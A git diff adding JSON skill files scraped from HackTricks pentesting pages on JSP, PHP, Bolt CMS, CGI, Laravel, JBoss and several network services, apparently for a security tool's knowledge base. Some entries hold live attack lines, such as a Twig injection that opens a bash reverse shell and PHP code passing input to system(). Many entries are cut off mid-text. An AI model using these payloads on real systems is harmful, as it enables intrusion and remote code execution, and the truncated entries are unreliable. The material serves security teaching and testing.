diff --git a/skills/network_services_pentesting_c2653ed2d6fa.json b/skills/network_services_pentesting_c2653ed2d6fa.json
new file mode 100644
index 0000000..1b7d74d
--- /dev/null
+++ b/skills/network_services_pentesting_c2653ed2d6fa.json
@@ -0,0 +1,19 @@
+{
+ "id": "network_services_pentesting_c2653ed2d6fa",
+ "category": "network-services-pentesting",
+ "title": "jsp",
+ "description": "# JSP\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **getContextPath** abuse\n\nInfo from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).\n\n```\n http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp\n```\n\nAccessing that web you may change all the links to request the information to _**rakeshmane.com**_:\n\n.png>)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n\n",
+ "payloads": [
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **getContextPath** abuse",
+ "Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).",
+ "http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp",
+ "Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:",
+ ".png>)",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/jsp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c4986a3d59ef.json b/skills/network_services_pentesting_c4986a3d59ef.json
new file mode 100644
index 0000000..3004284
--- /dev/null
+++ b/skills/network_services_pentesting_c4986a3d59ef.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_c4986a3d59ef",
+ "category": "network-services-pentesting",
+ "title": "php rce abusing object creation new usd get a usd get b",
+ "description": "# PHP - RCE abusing object creation: new $_GET[\"a\"]($_GET[\"b\"])\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nThis is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)\n\n## Introduction\n\nThe creation of new arbitrary objects, such as `new $_GET[\"a\"]($_GET[\"a\"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/explo",
+ "payloads": [
+ "# PHP - RCE abusing object creation: new $_GET[\"a\"]($_GET[\"b\"])",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)",
+ "## Introduction",
+ "The creation of new arbitrary objects, such as `new $_GET[\"a\"]($_GET[\"a\"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE.",
+ "## RCE via Custom Classes or Autoloading",
+ "The syntax `new $a($b)` is used to instantiate an object where **`$a`** represents the class name and **`$b`** is the first argument passed to the constructor. These variables can be sourced from user inputs like GET/POST, where they may be strings or arrays, or from JSON, where they might present as other types.",
+ "Consider the code snippet below:",
+ "```php",
+ "class App {",
+ "function __construct ($cmd) {",
+ "system($cmd);",
+ "class App2 {",
+ "function App2 ($cmd) {",
+ "system($cmd);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c68b806f5d77.json b/skills/network_services_pentesting_c68b806f5d77.json
new file mode 100644
index 0000000..db1d80f
--- /dev/null
+++ b/skills/network_services_pentesting_c68b806f5d77.json
@@ -0,0 +1,21 @@
+{
+ "id": "network_services_pentesting_c68b806f5d77",
+ "category": "network-services-pentesting",
+ "title": "5439 pentesting redshift",
+ "description": "# 5439 - Pentesting Redshift\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis port is used by **Redshift** to run. It's basically an AWS variation of **PostgreSQL**.\n\nFor more information check:\n\n\n{{#ref}}\nhttps://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html\n{{#endref}}\n\n{{#include ../banners/hacktricks-training.md}}\n",
+ "payloads": [
+ "# 5439 - Pentesting Redshift",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This port is used by **Redshift** to run. It's basically an AWS variation of **PostgreSQL**.",
+ "For more information check:",
+ "{{#ref}}",
+ "https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html",
+ "{{#endref}}",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5439-pentesting-redshift.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c76257b1f814.json b/skills/network_services_pentesting_c76257b1f814.json
new file mode 100644
index 0000000..096d8f7
--- /dev/null
+++ b/skills/network_services_pentesting_c76257b1f814.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_c76257b1f814",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php 7.0 7.4 nix only",
+ "description": "# disable_functions bypass - PHP 7.0-7.4 (\\*nix only)\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n## PHP 7.0-7.4 (\\*nix only)\n\nFrom [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)\n\n```php\n 143",
+ "openssl s_client -connect :993 -quiet",
+ "### NTLM Auth - Information disclosure",
+ "If the server supports NTLM auth (Windows) you can obtain sensitive info (versions):"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-imap.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c80fbf1f3224.json b/skills/network_services_pentesting_c80fbf1f3224.json
new file mode 100644
index 0000000..5498191
--- /dev/null
+++ b/skills/network_services_pentesting_c80fbf1f3224.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_c80fbf1f3224",
+ "category": "network-services-pentesting",
+ "title": "aem adobe experience cloud",
+ "description": "# AEM (Adobe Experience Manager) Pentesting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR). \n> From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.\n\nThe checklist below focuses on **",
+ "payloads": [
+ "# AEM (Adobe Experience Manager) Pentesting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).",
+ "> From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.",
+ "The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2026).",
+ "## 1. Fingerprinting",
+ "$ curl -s -I https://target | egrep -i \"aem|sling|cq\"",
+ "X-Content-Type-Options: nosniff",
+ "X-Dispatcher: hu1 # header added by AEM Dispatcher",
+ "X-Vary: Accept-Encoding",
+ "Other quick indicators:",
+ "* `/etc.clientlibs/` static path present (returns JS/CSS).",
+ "* `/libs/granite/core/content/login.html` login page with the \u201cAdobe Experience Manager\u201d banner.",
+ "* `` comment at the bottom of HTML.",
+ "## 2. High-value unauthenticated endpoints"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c93408787021.json b/skills/network_services_pentesting_c93408787021.json
new file mode 100644
index 0000000..092260d
--- /dev/null
+++ b/skills/network_services_pentesting_c93408787021.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_c93408787021",
+ "category": "network-services-pentesting",
+ "title": "smtp smuggling",
+ "description": "# SMTP Smuggling\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis type of vulnerability was [**originally discovered in this post**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/) were it's explained that It's possible to **exploit discrepancies in how the SMTP protocol is interpreted** when finalising an email, allowing an attacker to smuggle more emails in the body of the legit one, allowing to impersonate other users of the affect",
+ "payloads": [
+ "# SMTP Smuggling",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This type of vulnerability was [**originally discovered in this post**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/) were it's explained that It's possible to **exploit discrepancies in how the SMTP protocol is interpreted** when finalising an email, allowing an attacker to smuggle more emails in the body of the legit one, allowing to impersonate other users of the affected domain (such as admin@outlook.com) bypassing defenses such as SPF.",
+ "### Why",
+ "This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post:",
+ "
",
+ "### How",
+ "In order to exploit this vulnerability an attacker needs to send some data that the **Outbound SMPT server thinks that it's just 1 email but the Inbound SMTP server thinks that there are several emails**.",
+ "The researchers discovered that different **Inboud servers considers different characters as the end of the data** of the email message that Outbound servers doesn't.\\",
+ "For example, a regular end of the data is `\\r\\n.\\r`. But if the Inbound SMTP server also supports `\\n.`, an attacker could just add **that data in his email and start indicating the SMTP commands** of a new new ones to smuggle it just like in the previous image.",
+ "Ofc, this could only work if the **Outbound SMTP server doesn't also treat this data** as the end of the message data, because in that case it will see 2 emails instead of just 1, so at the end this is the desynchronization that is being abused in this vulnerability.",
+ "Potential desynchronization data:",
+ "- `\\n.`",
+ "- `\\n.\\r`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ca8acd18192f.json b/skills/network_services_pentesting_ca8acd18192f.json
new file mode 100644
index 0000000..f81312d
--- /dev/null
+++ b/skills/network_services_pentesting_ca8acd18192f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ca8acd18192f",
+ "category": "network-services-pentesting",
+ "title": "bolt cms",
+ "description": "# Bolt CMS\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## RCE\n\nAfter login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:\n\n- Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`\n - Check the value of theme\n\n\n\n- Select `File management` -> `View & edit templates`\n - Select the the",
+ "payloads": [
+ "# Bolt CMS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## RCE",
+ "After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:",
+ "- Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`",
+ "- Check the value of theme",
+ "",
+ "- Select `File management` -> `View & edit templates`",
+ "- Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`",
+ "- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig",
+ "- Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php), like: `{{['bash -c \"bash -i >& /dev/tcp/10.10.14.14/4444 0>&1\"']|filter('system')}}`",
+ "- And save changes",
+ "",
+ "- Clear the cache in `Maintenance` -> `Clear the cache`",
+ "- Access again the page as a regular user, and the payload should be executed"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/bolt-cms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_cabfa770e57e.json b/skills/network_services_pentesting_cabfa770e57e.json
new file mode 100644
index 0000000..7bd51f5
--- /dev/null
+++ b/skills/network_services_pentesting_cabfa770e57e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_cabfa770e57e",
+ "category": "network-services-pentesting",
+ "title": "pentesting ntp",
+ "description": "# 123/udp - Pentesting NTP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **Network Time Protocol (NTP)** ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. Because time is used in nearly every authentication, crypto-protocol and forensic process, **an attacker that can influence NTP can often bypass security controls or make attack",
+ "payloads": [
+ "# 123/udp - Pentesting NTP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **Network Time Protocol (NTP)** ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. Because time is used in nearly every authentication, crypto-protocol and forensic process, **an attacker that can influence NTP can often bypass security controls or make attacks harder to investigate.**",
+ "### Summary & Security Tips",
+ "- **Purpose**: Syncs device clocks over networks.",
+ "- **Importance**: Critical for security, logging, crypto-protocols and distributed systems.",
+ "- **Security Measures**:",
+ "- Use trusted NTP or NTS (Network Time Security) sources with authentication.",
+ "- Restrict who can query/command the daemon (``restrict default noquery``, ``kod`` etc.).",
+ "- Disable legacy Mode-6/7 control queries (``monlist``, ``ntpdc``) or rate-limit them.",
+ "- Monitor synchronization drift/leap-second state for tampering.",
+ "- Keep the daemon updated (see recent CVEs below).",
+ "**Default ports**",
+ "123/udp NTP (data + legacy control)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-ntp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_cad59b683919.json b/skills/network_services_pentesting_cad59b683919.json
new file mode 100644
index 0000000..8286692
--- /dev/null
+++ b/skills/network_services_pentesting_cad59b683919.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_cad59b683919",
+ "category": "network-services-pentesting",
+ "title": "pentesting ldap",
+ "description": "# 389, 636, 3268, 3269 - Pentesting LDAP\n\n{{#include ../banners/hacktricks-training.md}}\n\nThe use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.\n\nLDAP directories are structured to allow their distribution across several servers, with ea",
+ "payloads": [
+ "# 389, 636, 3268, 3269 - Pentesting LDAP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "The use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.",
+ "LDAP directories are structured to allow their distribution across several servers, with each server housing a **replicated** and **synchronized** version of the directory, referred to as a Directory System Agent (DSA). Responsibility for handling requests lies entirely with the LDAP server, which may communicate with other DSAs as needed to deliver a unified response to the requester.",
+ "The LDAP directory's organization resembles a **tree hierarchy, starting with the root directory at the top**. This branches down to countries, which further divide into organizations, and then to organizational units representing various divisions or departments, finally reaching the individual entities level, including both people and shared resources like files and printers.",
+ "**Default port:** 389 and 636(ldaps). Global Catalog (LDAP in ActiveDirectory) is available by default on ports 3268, and 3269 for LDAPS.",
+ "PORT STATE SERVICE REASON",
+ "389/tcp open ldap syn-ack",
+ "636/tcp open tcpwrapped",
+ "### LDAP Data Interchange Format",
+ "LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename).",
+ "```bash",
+ "dn: dc=local",
+ "dc: local",
+ "objectClass: dcObject"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-ldap.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_cd6f8067187c.json b/skills/network_services_pentesting_cd6f8067187c.json
new file mode 100644
index 0000000..bbc5598
--- /dev/null
+++ b/skills/network_services_pentesting_cd6f8067187c.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_cd6f8067187c",
+ "category": "network-services-pentesting",
+ "title": "10000 network data management protocol ndmp",
+ "description": "# 10000/tcp - Network Data Management Protocol (NDMP)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Protocol Information**\n\nFrom [Wikipedia](https://en.wikipedia.org/wiki/NDMP):\n\n> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \\([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through",
+ "payloads": [
+ "# 10000/tcp - Network Data Management Protocol (NDMP)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Protocol Information**",
+ "From [Wikipedia](https://en.wikipedia.org/wiki/NDMP):",
+ "> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \\([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server.",
+ "**Default port:** 10000",
+ "```text",
+ "PORT STATE SERVICE REASON VERSION",
+ "10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp",
+ "## **Enumeration**",
+ "```bash",
+ "nmap -n -sV --script \"ndmp-fs-info or ndmp-version\" -p 10000 #Both are default scripts",
+ "## Shodan",
+ "`ndmp`",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_cef979adc363.json b/skills/network_services_pentesting_cef979adc363.json
new file mode 100644
index 0000000..2f0a20f
--- /dev/null
+++ b/skills/network_services_pentesting_cef979adc363.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_cef979adc363",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php 5.2.3 win32std ext protections bypass",
+ "description": "# PHP 5.2.3 - Win32std ext Protections Bypass\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\n=5.6)\n\nLaravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).\nThe raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:\n\n``",
+ "payloads": [
+ "# Laravel",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Laravel SQLInjection",
+ "Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)",
+ "## APP_KEY & Encryption internals (Laravel >=5.6)",
+ "Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).",
+ "The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:",
+ "```json",
+ "\"iv\" : \"Base64(random 16-byte IV)\",",
+ "\"value\": \"Base64(ciphertext)\",",
+ "\"mac\" : \"HMAC_SHA256(iv||value, APP_KEY)\",",
+ "\"tag\" : \"\" // only used for AEAD ciphers (GCM)",
+ "`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas",
+ "`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.",
+ "Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, \u2026)**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/laravel.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_d1152c72e087.json b/skills/network_services_pentesting_d1152c72e087.json
new file mode 100644
index 0000000..b47a4cf
--- /dev/null
+++ b/skills/network_services_pentesting_d1152c72e087.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_d1152c72e087",
+ "category": "network-services-pentesting",
+ "title": "rpcclient enumeration",
+ "description": "# rpcclient enumeration\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n### Overview of Relative Identifiers (RID) and Security Identifiers (SID)\n\n**Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain.\n\n- **SIDs** serve as unique identifiers for domains, ensuring that each domain is distinguishable.\n- **RIDs** are appended to SIDs to cr",
+ "payloads": [
+ "# rpcclient enumeration",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Overview of Relative Identifiers (RID) and Security Identifiers (SID)",
+ "**Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain.",
+ "- **SIDs** serve as unique identifiers for domains, ensuring that each domain is distinguishable.",
+ "- **RIDs** are appended to SIDs to create unique identifiers for objects within those domains. This combination allows for precise tracking and management of object permissions and access controls.",
+ "For instance, a user named `pepe` might have a unique identifier combining the domain's SID with his specific RID, represented in both hexadecimal (`0x457`) and decimal (`1111`) formats. This results in a complete and unique identifier for pepe within the domain like: `S-1-5-21-1074507654-1937615267-42093643874-1111`.",
+ "### **Enumeration with rpcclient**",
+ "The **`rpcclient`** utility from Samba is utilized for interacting with **RPC endpoints through named pipes**. Below commands that can be issued to the SAMR, LSARPC, and LSARPC-DS interfaces after a **SMB session is established**, often necessitating credentials.",
+ "#### Server Information",
+ "- To obtain **Server Information**: `srvinfo` command is used.",
+ "#### Enumeration of Users",
+ "- **Users can be listed** using: `querydispinfo` and `enumdomusers`.",
+ "- **Details of a user** by: `queryuser <0xrid>`.",
+ "- **Groups of a user** with: `queryusergroups <0xrid>`."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_d2a386793d14.json b/skills/network_services_pentesting_d2a386793d14.json
new file mode 100644
index 0000000..3871be8
--- /dev/null
+++ b/skills/network_services_pentesting_d2a386793d14.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_d2a386793d14",
+ "category": "network-services-pentesting",
+ "title": "cgi",
+ "description": "# CGI Pentesting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Information\n\nThe **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \\(`/usr/share/webshells/perl/perl-reverse-shell.pl`\\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \\(`chmod +x`\\) and **access** the reverse shell **from the web browser** to execute it. \nIn order to test for **CGI vulns** it'",
+ "payloads": [
+ "# CGI Pentesting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Information",
+ "The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \\(`/usr/share/webshells/perl/perl-reverse-shell.pl`\\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \\(`chmod +x`\\) and **access** the reverse shell **from the web browser** to execute it.",
+ "In order to test for **CGI vulns** it's recommended to use `nikto -C all` \\(and all the plugins\\)",
+ "## **ShellShock**",
+ "**ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system.",
+ "Exploiting this vulnerability the **page could throw an error**.",
+ "You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi_mod** \\(with cgi folder\\) or using **nikto**.",
+ "### **Test**",
+ "Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.",
+ "**Nmap**",
+ "```bash",
+ "nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi",
+ "## **Curl \\(reflected, blind and out-of-band\\)**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/cgi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_d47a798b421f.json b/skills/network_services_pentesting_d47a798b421f.json
new file mode 100644
index 0000000..5619467
--- /dev/null
+++ b/skills/network_services_pentesting_d47a798b421f.json
@@ -0,0 +1,24 @@
+{
+ "id": "network_services_pentesting_d47a798b421f",
+ "category": "network-services-pentesting",
+ "title": "jboss",
+ "description": "# JBOSS\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n\n## Enumeration and Exploitation Techniques\n\nWhen assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. ",
+ "payloads": [
+ "# JBOSS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Enumeration and Exploitation Techniques",
+ "When assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. This access facilitates interaction with MBeans through specific servlets:",
+ "- For JBoss versions 6 and 7, **/web-console/Invoker** is used.",
+ "- In JBoss 5 and earlier versions, **/invoker/JMXInvokerServlet** and **/invoker/EJBInvokerServlet** are available.",
+ "Tools like **clusterd**, available at [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), and the Metasploit module `auxiliary/scanner/http/jboss_vulnscan` can be used for enumeration and potential exploitation of vulnerabilities in JBOSS services.",
+ "### Exploitation Resources",
+ "To exploit vulnerabilities, resources such as [JexBoss](https://github.com/joaomatosf/jexboss) provide valuable tools.",
+ "### Finding Vulnerable Targets",
+ "Google Dorking can aid in identifying vulnerable servers with a query like: `inurl:status EJInvokerServlet`",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/jboss.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_d844c5048629.json b/skills/network_services_pentesting_d844c5048629.json
new file mode 100644
index 0000000..e4e684b
--- /dev/null
+++ b/skills/network_services_pentesting_d844c5048629.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_d844c5048629",
+ "category": "network-services-pentesting",
+ "title": "pentesting dns",
+ "description": "# 53 - Pentesting DNS\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## **Basic Information**\n\nThe **Domain Name System (DNS)** serves as the internet's directory, allowing users to access websites through **easy-to-remember domain names** like google.com or facebook.com, instead of the numeric Internet Protocol (IP) addresses. By translating domain names into IP addresses, the DNS ensures web browsers can quickly load internet resources, simplifying how we navigate the online world.\n\n**Defau",
+ "payloads": [
+ "# 53 - Pentesting DNS",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "The **Domain Name System (DNS)** serves as the internet's directory, allowing users to access websites through **easy-to-remember domain names** like google.com or facebook.com, instead of the numeric Internet Protocol (IP) addresses. By translating domain names into IP addresses, the DNS ensures web browsers can quickly load internet resources, simplifying how we navigate the online world.",
+ "**Default port:** 53",
+ "PORT STATE SERVICE REASON",
+ "53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)",
+ "5353/udp open zeroconf udp-response",
+ "53/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)",
+ "### Different DNS Servers",
+ "- **DNS Root Servers**: These are at the top of the DNS hierarchy, managing the top-level domains and stepping in only if lower-level servers do not respond. The Internet Corporation for Assigned Names and Numbers (**ICANN**) oversees their operation, with a global count of 13.",
+ "- **Authoritative Nameservers**: These servers have the final say for queries in their designated zones, offering definitive answers. If they can't provide a response, the query is escalated to the root servers.",
+ "- **Non-authoritative Nameservers**: Lacking ownership over DNS zones, these servers gather domain information through queries to other servers.",
+ "- **Caching DNS Server**: This type of server memorizes previous query answers for a set time to speed up response times for future requests, with the cache duration dictated by the authoritative server.",
+ "- **Forwarding Server**: Serving a straightforward role, forwarding servers simply relay queries to another server."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-dns.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_d97999eff32d.json b/skills/network_services_pentesting_d97999eff32d.json
new file mode 100644
index 0000000..53d0d72
--- /dev/null
+++ b/skills/network_services_pentesting_d97999eff32d.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_d97999eff32d",
+ "category": "network-services-pentesting",
+ "title": "flask",
